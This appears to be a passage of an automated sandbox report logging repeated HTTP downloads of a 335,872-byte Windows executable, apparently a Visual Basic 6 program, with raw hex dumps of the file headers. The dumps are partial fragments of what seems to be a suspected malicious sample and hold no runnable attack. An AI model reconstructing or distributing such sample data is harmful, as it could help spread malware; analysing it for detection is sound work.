00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:16 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:17 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:17 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:18 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:40 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
